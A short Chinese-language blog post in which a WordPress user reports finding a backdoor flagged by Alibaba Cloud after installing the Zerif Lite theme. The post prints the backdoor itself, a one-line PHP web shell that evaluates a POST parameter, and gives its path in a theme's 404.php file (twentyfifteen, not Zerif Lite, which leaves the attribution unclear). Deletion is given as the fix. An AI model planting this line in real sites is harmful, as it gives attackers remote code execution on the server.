wordpress的Zerif Lite免费版的一个后门

最近在阿里云上安装了一个wordpress,又安装了Zerif Life主题,不久阿里云提示我某模板文件中有一个后门,于是去查看了,一下,果然是赤裸裸的后门啊,

在代码顶部竟然有这样一段:

<?php @eval($_POST['dd']);?>

路径如下:


wordpress/wp-content/themes/twentyfifteen/404.php

顺便检查了一下其他模板文件吧,可能其他文件中也存在这个后门。

解决方法当然很简单,把这一行删掉就OK了,坑爹的阿里云还非要我花钱去处理~~~


分类:

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注